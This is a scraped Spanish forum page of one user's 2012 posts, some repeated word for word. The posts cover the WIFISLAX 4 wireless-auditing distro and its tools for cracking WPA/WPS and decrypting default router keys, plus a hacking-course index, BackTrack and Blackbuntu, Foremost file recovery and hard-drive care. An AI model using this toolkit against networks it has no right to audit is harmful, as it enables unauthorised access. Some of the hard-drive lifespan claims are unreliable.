Lanzamos la version 4.0, bajo un sistema basado en porteus, slax, wifiway y slackware 13.37, WIFISLAX 4 esta formado por paqueteria slackware 13.37 con lo que es fácil de ampliar buscando los paquetes ya hechos y convirtiéndolos a xzm.
Es una version de tamaño reducido, pero con lo necesario para auditar wireless aprovechando todos los ataques conocidos, como el último y más sonado fallo en wps y la ultilidad que lo aprovecha (reaver-wps).
Tenéis toda la bateria de desencriptadores de patrones conocidos, jazzteldecrypter, wlandecrypter, wpamagic, etc etc, además de multiattack 1.0.7 el cual de un plumazo es capaz de demostrar la vulnerabilidad de los routers al alcance, todo de un plumazo.
Generadores de diccionarios para ataques wpa, sniffers de red como wireshark, firefox 10.0.2 como navegador principal, con flashplayer 11 activado.
El sistema pesa unos 200 megas aproximados, ¿ por qué aun siendo pequeño es grande en tamaño?, pues por que queremos ofrecer una base, en la cual se puede hacer otras cosas...como escuchar musica o ver videos..navegar ...ademas ofrecemos bastante cantidad de drivers de todo tipo, si empezásemos a quitar todo eso fácilmente saldría un sistema como los que circulan por la red de unos 50-60 megas ... pero no buscamos eso.
El sistema cuenta con el kernel 3.1.10 al que se le aplicaron varios parches ... como el aspm, que corregia el excesivo consumo de energia de los kerneles 3.1.x por un fallo, además se le añadio el parche de john kolivas, el cual hace que la cpu no este todo el tiempo consumiendo al 100%, y dos parches basicos para auditoria wireless, el famoso fix-channel-negative y el de fragmentación.
Se ha buscado deliberadamente que el aspecto sea como el de wifiway, usando sus mismos iconos aunque no tan agresivo el entorno.
WIFISLAX 4, se puede ampliar fácilmente mediante modulos xzm, o paqueteria slackware la cual se puede convertir a xzm con un sólo click, o añadiéndole el módulo devel, el cual cuenta con herramientas de desarrollo, como las gcc, git, o subversion para poder compilar vuestros propios programas, el módulo devel sólo sirve para eso...compilar codigo.
La distribucion ofrece soporte NATIVO, para la tarjeta wifistation interior, creo que somos los unicos que ofrecemos soporte a dicho adaptador, puesto que sólo se consigue editando parte de los drivers ath9k.
Al mismo tiempo que lanzamos la iso, se añadirán varios módulos de diversas índoles ...( aplicaciones, algun driver, etc.)
Se comenzó el sistema usando como base inicial una iso porteus 1.0rc2 a la cual se le fueron añadiendo y modificando cosas según las necesidades, este es el log del trabajo realizado.
CitarLIBRERIAS AÑADIDAS DEL REPOSITORIO SLACKWARE 13.37
-BISON
-FLEX
-LIBCAP
-cairomm-1.9.8-i486
-curl-7.21.4-i486
-iw-0.9.20-i486-1
-glibmm-2.27.99.2-i486
-iproute2-2.6.37-i486
-libXxf86dga-1.1.2-i486
-gtkmm-2.24.0-i486
-libsigc++-2.2.9-i486
-xdpyinfo-1.2.0-i486
-atkmm-2.22.5-i486
-libnet-1.1.5-i486
-pangomm-2.28.2-i486
-------
-CAMBIADAS GCC POR LAS DE BERNI VERSION 4.6.1 y sus 2 dependencias
-añadido kommander editor y executor
-añadido GIT 1.7.8
-añadido subversion 1.6.16
-añadido apr y apr-utils
-añadido gparted 0.10.0
-añadido record my desktop 0.3.8
-añadido plugin flash 11.1 r102
-actualizadas glibc a version 2.14 de berni
-modificada secuencia de arranque para hacerla un poco mas vistosa
----------------------------Modulo wireless -------------------------
-aircrack-ng-trunk-2012-01-17-r2028
-airoscript nuevo portado de wifiway
-Alfatools ---> driver preinstalado,no necesitas instalarlo a cada sesion.
-cowpatty-4.6
-decsagem
-dlinkdecrypter-0.2
-ettercap-0.7.4
-feedingbottle-3.2
-Gambas-runtime
-GeneradorDiccio + configurador
-jazzteldecrypter-0.2.1
-john-the-ripper-1.7.9
-mac2wepkey
-macchanger-1.5.0
-minidwep-gtk-21026
-multiattack-1.0.6
-nmap-5.51
-ono4xx v0.0.4a
-pyrit-0.4.0
-reaver-1.3 + walsh 1.3
-R-WlanXDecrypter0.9
-salvar_sesion_reaver
-stkeys
-Stringenerator-1.3
-tele2dic_v0.2
-wepattack-0.1.3
-wepcrack
-wicd-1.7.0
-wifi-radar-2.0.s08
-wireshark-1.6.5
-wlan4xx-0.2.0
-wlandecrypter-1.3.3
-wlanreaver-0.5 ( adaptado a wifislax )
-Wpa-gui
-WPAmagickey-0.2.3
------- 20-01-2012 -----
-añadido kismet-2011-03-R2
-añadido tema gtk2 relight ( mismo tema gtk que wifiway )
-reconfigurado kde , en vez de utf8 , configurado a iso-8859-15 ( no da problemas con tildes
-reconfigurado rc6 , para que ejecute cleanup solo cuando estamos en live.
-actualizado gparted a version 0.11.0
-actualizado reaver a version 1.4-revision 102 ( test ok )
-------- 21-01-2012 ------
-retocado rc6 en la parte final del script faltaba codigo.
-eliminado del modulo core, ruta lib/modules/�2.6.37?
-modificado binario wpamagickey
--------22-01-2012---------
-cambiado idioma de sistema a español iso8859-15 (es_ES@euro)
-añadido enlace simbolico a libtheora
-añadido libffi 3.0.10
-añadido pgpme 1.3.0
-añadido slapt-get-0.10.2j
-añadido libassuan-2.0.1
-añadido gnupg-1.4.10
------23-01-2012-------
-añadido liblinuxlive (importantisimo para txz2xzm , deb2xzm etc )
-añadido stripdir (sin menus ni servicios ya que solo es para desaroolladores
-añadido xzm2dir (para instalar modulos xzm desde instalacion hd)
-añadido make_xorg y make_xorg_list
-arreglados conversores txz a xzm y deb a xzm (ya todo puede ser convertido a xzm)
-añadido merge_modules (unir varios modulos en 1 )
-actualizado reaver a version 1.4 final
-------24-01-2012-----------
-modificado minidwep , ya no lanza el cartel molesto inicial.
-actualizada suite aircrack , a revision 2031 del dia 24 de enero 2012
-eliminados los firmwares de videocamaras etc (ahorro 5 megas xzm y 15 megas en hd)
-añadida configuracion drivers ath9k nocrypth=1
-actualizados drivers wireless a ( compat-wireless-2012-01-23 )
-eliminacion de elementos de escritorio tales como sistemas de color extra
-eliminacion de los ficheros readme
-conpilado el driver r8187 alfatools ( se puede prescindir totalmente del devel )
-------15-2-2012-----
-añadido crda 1.1.2 ( txpower y canales 12 y13 )
-actualizado multiattack a version 1.0.7
-retocado install (hwagm)
-actualizado firmware ar9170
-añadido M2Crypto-0.20.2-i486-1
-actualizados drivers wireless a version compat-wireless-2012-02-01
con soporte para wifistation INTERIOR
-añadido el hdd module installer
-----18-02-2012------
-actualizada suite aircrack a version-r2101
-actualizados driver wireless a version 15-02-2012
---23-02-2012----
-actualizado gparted a version 0.12.0
-retiradas glibc-2.14 (incompatinilidad con kernel porteus)
-añadido glibc 2.13
-añadido kernel porteus 3.2.4
-actualizados drivers wireless , con soporte wifistation INTERIOR version 22-02-2012
-reconstruido modulo core ,para adaptarlo a kernel porteus
-remodificado initrd.xz para adaptar el arranque a wifislax
-remodificadas las opciones de arranque (eliminadas cosas obsoletas)
-------24-02-2012-------------
-configurado sistema a es_ES.utf8 ( es el que menos problemas da a la larga )
-eliminacion de kernel porteus
***** Integracion kernel 3.1.10 WIFISLAX *****
-Añadidas kernel soUrces recortadas
-Añadidos drivers compat-wireless con coporte wifistation INTERIOR
----25.02-2012--------
-RECOMPILADO KERNEL 3.1.10 por que no mostraba estado de bateria.
parcheado driver ath9k de kernel , para no añadir stack compat
wireless y añadirle a los drivers del kernel soporte nativo a
wifistation interior.
-------26-02-2012------
-arreglado servicio instalar paquetes slackware tgz y txz
-eliminado servicio convertir paquete rpm a xzm
-eliminado alfatools ( el driver no es valido en kerneles superiores a 3.1)
-eliminada gambas runtime (solo las usaba alfatools)
-ACTUALIZADO KERNEL A ULTIMA VERSION 3.2.7
-eliminado dlinkdecrypter por problema desconocido
------27-02-2012-------
-actualizado firefox a version 10.0.2
------28-02-2012-------------
-actualizado kernel a version de hoy mismo 3.2.8
--------02-03-012-------
-cambiado kernel a version 3.1.10 , por varios problemas detectados, sobretodo
en cuanto a drivers , por ejemplo minidwep se hace un lio con los kernles 3.2.x
ya que las interfaces al hacer iwconfig , ni siquiera se muestarn ordenadas.
-reconfigurado codificacion de sistema a es_ES@euro
-actualizada iw tool de 0.9.20 a version 3.3
---03-03-2012-----
-cambiado flashplayer 11 por version 10 mas estable
-recompilado kernel 3.1.10 + parche fragmentacion
-actualizado wicd a version 1.7.1
-añadida imlib que necesitaba kuickshow
-reconfigurado ksnapshot
----06-03-2012-----
-configurado crda a 20dbm
-creados 2 modulos de configuraciones a 27 y 30 dbm (dentro de la carpeta optional)
-recompilado kernel por que no mostraba el estado de la bateria
-eliminado de la raiz un simbolico llamado "sin" , que no valia para nada
--------13-03-2012---------
-corregido problemas con montaje/desmontaje unidades de almacenamiento
-eliminados simbolicos muertos en usr/bin
-corregido enlace simbolico de libstc++ para que la distro trabaje sin modulo devel
----20-03-2012-----
-añadida libreria ORBit2-2.14.19-i486-1
-añadida libreria libevent-2.0.11-i486-1sl
-añadida libreria libsoup-2.28.2
-añadida libreria GConf-2.32.1-i486-1
-añadida libreria libcanberra-0.28
-añadida libreria sudo-1.7.4p6-i486-1
-modificado minidwep ,ahora abre irodump y lo muestra mientras escanea y ataca.
-actualizado flashplayer a version 11
Como veis, el log acabo ayer mismo.
Agradecer a las personas que me han ayudado durante el desarrollo, mediante pruebas, ideas, avisos de actualicaciones etc.
Gracias al staff, que con la ayuda de todos son posibles estas cosas.

DESCARGA PRINCIPAL: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
MD5: 0d683b85155ee4d87db418d8c6bce297
#169
GNU/Linux / Mapa interactivo del Kernel Linux
Marzo 30, 2012, 05:31:10 PMTodos sabemos, o deberíamos, que el kernel Linux es el motor de cualquiera de nuestras distribuciones preferidas, No tienes permitido ver enlaces. Registrate o Entra a tu cuenta. Conocerlo bien es esencial si te vas a dedicar a desarrollar para este sistema y requiere tiempo, conocimientos y experiencia, algo muchas veces fuera del alcance del usuario de a pie.
Pero eso no significa que no podamos No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, o al menos conocer algo mejor como funciona. Por la red podemos encontrar extensos y completos manuales, la gran mayoría muy técnicos y por lo tanto pesados para un usuario normal. Pero si lo que queremos es conocer su funcionamiento de una forma fácil, podemos dar un vistazo a este Kernel interactivo.
Desde la web Make Linux, han elaborado un ingenioso mapa del No tienes permitido ver enlaces. Registrate o Entra a tu cuenta en forma gráfica, que van completando poco a poco, en el que podemos no solo ver su estructura sino interactuar directamente con el.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mediante los enlaces de este mapa, encontraremos la información e incluso los archivos a todo lo referente a sus funciones, módulos, No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, etc.
Además también nos muestran otro interesante mapa para conocer mejor el corazón de Android y como actúan sus aplicaciones, aunque este no es interactivo por ahora.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Si quieres conocer mejor Linux, no dudes en darte un paseo por este mapa interactivo del Kernel Linux, seguro que te parecerá interesante.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#170
GNU/Linux / Recuperando archivos borrados, fácilmente con Foremost
Marzo 30, 2012, 05:29:17 PMNo es la primera vez que me ocurre que cuando hago limpieza en un No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, me cepillo algún archivo que luego recuerdo que necesitaba.
Para los despistados como yo, esto tiene solución, existen un gran numero de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta pensadas para recuperar datos perdidos o borrados por error. Una de ellas es Foremost (forensic data recovery), que trabaja desde la linea de comandos con una sintaxis muy simple, pero muy efectiva.
Su forma más básica seria: foremost tipo_de_archivo_a_recuperar /directorio_de_búsqueda /directorio_de_salida.
Como siempre digo, es más fácil de entender como funciona con un ejemplo practico, así que vamos allá.
En este caso voy a utilizar No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y un Pendrive (sdb1), que contiene una imagen jpg que borraré junto con la papelera, que es una carpeta oculta.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Aquí hago un inciso para comentar que yo he utilizado esta imagen como ejemplo, pero los formatos soportados son muchos más, entre ellos: jpg, gif, png, bmp, avi, exe, mpg, wav, wmv, mov, pdf, ole, doc, zip, xml, sxw, rar, htm, cpp, etc.
Comencemos, primero instalamos Foremost...
CitarCódigo: text [b]sudo apt-get install foremost[/b]
... y recuperamos la imagen:
CitarCódigo: text [b]sudo foremost -t jpg -i /dev/sdb1 -o /home/hispalis70/recuperado[/b]
La opción -t indica el tipo de archivo a buscar, si no sabemos cual es o queremos recuperar diferentes tipos de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, lo sustituiremos por all, que recuperará todos los archivos que encuentre. Con -i indicamos el lugar donde buscarlo y con -o donde guardarlo. La carpeta donde guardarlo la he llamado /recuperado y no hace falta crearla.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Tan sencillo como eso, si nos dirigimos a la carpeta creada veremos nuestra No tienes permitido ver enlaces. Registrate o Entra a tu cuenta de nuevo.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Pero, ¿y si hemos formateado el disco?
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No hay problema, si no hemos escrito encima, el archivo se recupera igualmente aunque formateemos el disco.
Espero que os sea de ayuda.
Más información en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#171
Hacking / Curso de Hacking en Vídeo
Marzo 30, 2012, 01:28:44 PM
Curso basico de hacking
1.Introducción
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
2.Footprinting
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
3.Scanning
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
4.Anonimato
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
5.Enumeracion
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
6.Ganando acceso
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
7.Escalando privilegios
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
8.Hardering
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Curso avanzado hacking
0.Introduccion
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
1.Protocolos y servicios capas de red
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
2.Analisis de trafico metodo sniffing
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
3-4.Reconocimiento del objetivo
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
5.Enumeracion del objetivo
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
6.System hacking
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
7.Troyanos y backdoors
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
8.Virus y gusanos
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
9.Denegacion de servicio
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
10.Hacking wireless
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
11.SQL Injection
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
12.HoneyPots
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
13.Seguridad en VPN
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
14.Linux Hacking
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
15.Buffers Overflow
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
16.Vulnerabilidades WEB
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
17.Criptografia VPN
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
18.Codigo Virico
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
19.Escritura de Exploits
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
20.IDS y HIDS
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
1.Introducción
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
2.Footprinting
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
3.Scanning
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
4.Anonimato
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
5.Enumeracion
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
6.Ganando acceso
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
7.Escalando privilegios
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
8.Hardering
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta | No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Curso avanzado hacking
0.Introduccion
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
1.Protocolos y servicios capas de red
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
2.Analisis de trafico metodo sniffing
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
3-4.Reconocimiento del objetivo
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
5.Enumeracion del objetivo
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
6.System hacking
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
7.Troyanos y backdoors
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
8.Virus y gusanos
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
9.Denegacion de servicio
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
10.Hacking wireless
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
11.SQL Injection
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
12.HoneyPots
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
13.Seguridad en VPN
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
14.Linux Hacking
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
15.Buffers Overflow
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
16.Vulnerabilidades WEB
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
17.Criptografia VPN
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
18.Codigo Virico
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
19.Escritura de Exploits
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
20.IDS y HIDS
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#172
GNU/Linux / Backtrack 5 R2 USB Persistente y partición común de intercambio con Windows
Marzo 30, 2012, 01:23:53 PM
Dada la reciente aparición de la suite de auditoría Backtrack en su versión 5 y revisión 2, me he animado a hacer un manual con los siguientes objetivos:
- Instalar BT5 en un pendrive con persistencia, es decir, que todos los añadidos, actualizaciones, instalaciones de paquetes que realicemos se conserven como lo harían en una instalación convencional en un disco duro.
- Tener una partición ( un espacio físico ) en el pendrive o dispositivo USB que utilicemos para poder intercambiar archivos y datos entre BackTrack y Windows de forma transparente.
- Explicar como queda el dispositivo USB después de la instalación y posibilidades que nos brinda.
Sin más , os dejo el link al documento en formato PDF.
Mirror 1: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mirror 2: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mirror 2: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Autor: niknaiz
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
- Instalar BT5 en un pendrive con persistencia, es decir, que todos los añadidos, actualizaciones, instalaciones de paquetes que realicemos se conserven como lo harían en una instalación convencional en un disco duro.
- Tener una partición ( un espacio físico ) en el pendrive o dispositivo USB que utilicemos para poder intercambiar archivos y datos entre BackTrack y Windows de forma transparente.
- Explicar como queda el dispositivo USB después de la instalación y posibilidades que nos brinda.
Sin más , os dejo el link al documento en formato PDF.
Mirror 1: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mirror 2: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mirror 2: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Autor: niknaiz
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#173
GNU/Linux / Blackbuntu
Marzo 30, 2012, 01:23:23 PM
Hola pues recien eh descubierto esta distribucion de linux llamada "Blackbuntu" que practicamente es ubuntu 10.10 con las herramientas del backtrack.
La ventaja que le veo es que no es necesario tener una distribucion para uso normal y otra para pentesting sino solamente puedes tener blackbuntu y trabajar perfectamente sin que te falte alguna herramienta ya sea para hacer la tarea o para hacer "pruebas de laboratorio" xD..


Pueden bajarlo de aca No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos!.
La ventaja que le veo es que no es necesario tener una distribucion para uso normal y otra para pentesting sino solamente puedes tener blackbuntu y trabajar perfectamente sin que te falte alguna herramienta ya sea para hacer la tarea o para hacer "pruebas de laboratorio" xD..


Pueden bajarlo de aca No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Saludos!.
#174
GNU/Linux / 14 revistas sobre Linux [Software libre y código abierto] [Español] [PDF]
Marzo 30, 2012, 01:22:30 PM
Características de la descarga:
Formato: Pdf
Compresión: .rar
Peso: 71.9 MB
Idioma: Español
Descarga con No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Descarga con Depositfiles:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#175
Hardware y Reparaciones / Como mantener nuestro dısco duro: Consejos y verdades
Marzo 30, 2012, 01:18:57 PM
Uno de los temas que más debe preocuparnos en nuestro ordenador es el mantenimiento del disco duro, ya que es en él en el que tenemos instalado nuestro sistema operativo, nuestros programas y donde guardamos nuestros datos.
El mantenimiento de un disco duro se debe mirar desde dos aspectos diferentes. Uno es el mantenimiento del disco en sí, desde el punto de vista de hardware y otro es el mantenimiento del disco duro en temas de software.
Vamos a empezar por el mantenimiento del disco duro como tal, es decir, como un componente del ordenador, y de camino vamos a ver la verdad que encierran algunos comentarios que circular por ahí.
Mantenimiento del disco duro (hardware):
El disco duro es un componente de harware bastante macizo, pesado... y bastante delicado, que, como todo elemento de nuestro ordenador, necesita de una cierta atención.
Lo primero que tenemos que tener en cuenta es que se trata de un elemento de alta precisión, con unos discos internos que giran normalmente a 7.200 rpm y con unas cabezas lectoras que se desplazan a una gran velocidad a una distancia de los discos que se calcula en micras (una mota de polvo no cabe entre la cabeza y en disco), pero que en ningún momento pueden tocar este, ya que entonces ocurriría lo que se conoce como un aterrizaje de cabezales, con el consiguiente daño tanto para el disco como para el cabezal.
Con todo esto, la primera conclusión que se saca es que no es nada recomendable hacer movimientos bruscos del equipo si este está encendido, ya que hay que tener en cuenta que si bien las cabezas cuando no están leyendo o escribiendo se encuentran en una posición de reposo (en los discos muy antiguos había que aparcar los cabezales), un golpe o movimiento brusco pueden desplazar los cabezales, produciéndose el aterrizaje ya mencionado.
Con los discos externos debemos tener especial cuidado, ya que, aunque esté apagado, un golpe fuerte puede dañar el disco de forma irreparable.
También debemos asegurarnos de que tenga las menores vibraciones posibles, ya que un exceso de vibraciones en el disco duro puede llegar a dañarlo.
Otro factor muy importante es la temperatura de funcionamiento del disco. Un disco duro suele tener una temperatura de trabajo de entre 45º y 50º, con un tope operativo de sobre 60º. Unas temperaturas superiores a estas pueden causar un mal funcionamiento y, a la larga, provocar una avería. Es muy conveniente, sobre todo si nuestros programas o hábitos de uso del ordenador implican unos accesos al disco constantes y grandes, que le pongamos algún medio de refrigeración extra. Hay en el mercado disipadores diseñados especialmente para los discos duros que no son caros y van muy bien.
También es conveniente limpiarlo a menudo. Recordad que el polvo hace de aislante e impide una buena refrigeración.
Fundamental es que los voltajes que recibe sean los correctos (recibe tanto 12v como 5v), por lo que una buena fuente de alimentación y un estabilizador son dos cosas muy importantes para la salud de nuestro disco duro, aunque esto es común para todo el ordenador.
Y ahora vamos a ver algunas ''cosillas'' y comentarios que circulan por esos mundos y vamos a ver su fundamento y verdad.
- Formatear el disco duro acorta su vida y lo puede dañar:
No hay ninguna base en esta afirmación. Cuando se formatea un disco duro lo único que estamos haciendo son operaciones de escritura, y además el desplazamiento de los cabezales en este tipo de operaciones es bastante más lineal y constante que en una operación normal de lectura/escritura, por lo que el desgaste del disco es incluso inferior a cuando estamos trabajando con él.
Otra cosa es cuando se trata de un formateo a bajo nivel o de la utilización de programas de recuperación de discos. Estos procesos sí que suponen una altísima carga de trabajo para el disco duro y pueden acortar su vida útil, pero en ningún caso de forma significativa. Además, cuando recurrimos a estos sistemas es porque tenemos serios problemas en el disco, y en la mayoría de los casos las opciones son o emplear estos sistemas o tirar el disco, lo que sí que acorta drásticamente su vida útil.
- Montar un disco en RAID alarga su vida:
Esta teoría sólo sería válida para un RAID 0 en varios discos, pero ojo, por montar dos discos no quiere decir que la vida útil se duplique, simplemente que van a tener menos carga de trabajo al repartirse las operaciones de lectura/escritura, pero esto, como ya hemos visto, sólo es una parte de la ecuación. En otros tipos de RAID no hay ninguna diferencia.
El desgaste es mínimo en operaciones de lectura/escritura, y además los discos siempre están girando.
- Hacer varias particiones es bueno/malo para el disco duro:
Pongo bueno/malo porque se han dicho ambas cosas, y ambas son falsas. Para el disco duro no supone ninguna diferencia el estar dividido en una, dos o más particiones.
- Tal sistema operativo acorta la vida del disco duro:
Ultimamente han circulado rumores de que Ubutu acorta el ciclo de vida útil de los discos duros, sobre todo en portátiles. Esto es algo totalmente falso. La vida útil de un disco no depende del sistema operativo que tengamos instalado, sino de otros factores.
- Es mejor apagar el ordenador y volver a encenderlo que reiniciar (reset):
Pues para la vida del disco no. Mientras que apagar y encender supone parar el disco duro y volver a encenderlo, reiniciar no supone una paradadel disco, por lo que el desgaste es menor.
Por cierto, que lo que si que es bastante perjudicial es apagar y encender el equipo sin dejar un cierto tiempo para que se detenga totalmente el giro del disco duro.
En todo caso, siempre es mucho más perjudicial apagar o resetear desde el ordenador (con los botones de apagado o de reset) que hacerlo desde el sistema operativo.
- Es bueno apagar el ordenador cuando no lo utilicemos:
Pues si lo miramos bajo el punto de vista de un ahorro de energía, sí, pero si lo miramos bajo el punto de vista de mantenimiento del disco duro, no. Un disco duro es precisamente en los procesos de apagado/encendido cuando más sufre y más desgaste tiene, no por que tenga que trabajar más leyendo datos para el arranque, sino por el simple hecho de arrancar.
En general podemos decir que se debe apagar el ordenador cuando el tiempo de inactividad de este vaya a ser superior a las tres o cuatro horas. Si el tiempo de inactividad va a ser menor son preferibles otros métodos, como suspensión, hibernación o inactividad, que producen un arranque del disco menos brusco que un apagado y posterior encendido del sistema. Lo que si que es bueno en general es apagar totalmente el equipo, desconectándolo de la corriente.
La vida media de un disco se mide en ciclos de inicio/parada, y un disco normal suele tener una vida superior a los 50.000 ciclos (este es el mínimo que garantizan la mayoría de fabricantes), lo que hace que su vida útil sea bastante larga.
Evidentemente hay otros factores que influyen en la vida útil de un disco duro, pero en condiciones normales de uso con un trabajo bastante intensivo esta vida útil está por encima (teóricamente) de los 30 años, siendo este ciclo superado en discos de gama alta y discos especiales para servidores.
En mi caso, tengo un Olivetti 80286 con casi 20 años y el disco duro es el original y funciona a la perfección (y eso que ni las calidades de los materiales ni la tecnología de fabricación eran las mismas en aquella época).
Que un disco sólo nos dure un par de años tan sólo es síntoma de una baja calidad de este o, en la gran mayoría de las ocasiones, de un mal uso del mismo, del que sólo nosotros somos responsables. Decir que un disco duro ha durado tres o cuatro años no es precisamente una buena marca. Hay que tener en cuenta que muchos fabricantes de discos duros ofrecen una garantía de tres años, y si hacen esto es porque no esperan ningún problema en ese periodo de tiempo.
Y ya que en ello estamos, por todo lo expuesto anteriormente, es fácil comprender que la vida útil de un disco duro en un portátil sea inferior a la de un disco duro en un ordenador de sobremesa, a pesar de un especial diseño en cuanto a resistencia y tolerancia a golpes y vibraciones superior en el caso de discos para portátiles, así como unas inercias de giro bastante menores. También influye bastante en este tipo de ordenadores los gestores de energía (sobre todo cuando funcionan a batería), que obligan al disco duro a un número excesivamente alto de paradas, y por lo tanto, de ciclos de inicio/parada.
Y ahora vamos a ver un poco el mantenimiento del software, que sí que influye en su desgaste y vida útil, así como en su rendimiento.
Mantenimiento del disco duro (software):
Como ya hemos visto en la parte de este tutorial relativa al hardware, micho se ha dicho de disco en RAID, de apagar el ordenador, de particiones... pero muchas veces nos olvidamos de cómo ahorrarle trabajo a nuestro disco, y esto se hace manteniendo nuestro software en condiciones.
Una bueno forma es hacer un buen mantenimiento de éste de forma periódica, procurando que la información de se encuentre lo menos fragmentada que sea posible. Con ellos no es que las cabezas vayan a efectuar menos operaciones de lectura/escritura (que van a hacer las mismas), sino que los desplazamientos de las cabezas van a ser menos bruscos y menos amplios. Esto va a afectar sobre todo al rendimiento del disco duro y de paso también en su conservación, ya que movimientos menos bruscos y amplios significa también generar menos temperatura.
Por último, vamos a ver cuales son los grandes enemigos de nuestro disco duro:
- Golpes y movimientos bruscos.
Esto es muy malo con los discos en movimiento, pero también lo es con los discos parados, incluso desconectados.
- Una mala alimentación.
Una mala alimentación y cortes o sobrecargas eléctricas pueden incluso dejar nuestro disco totalmente inutilizado.
- Una mala refrigeración.
Un trabajo constante por encima de su temperatura media de funcionamiento termina por bajar su rendimiento y por estropear físicamente el disco duro.
- Una fuente magnética muy intensa.
Una fuente magnética muy intensa no sólo nos puede borrar los datos, sino que puede dañar de forma irrecuperable los discos internos de nuestro disco duro. Evidentemente un disco duro está bastante bien protegido, pero cuando lo tengamos desinstalado debemos tener mucho cuidado y mirar muy bien donde lo colocamos.
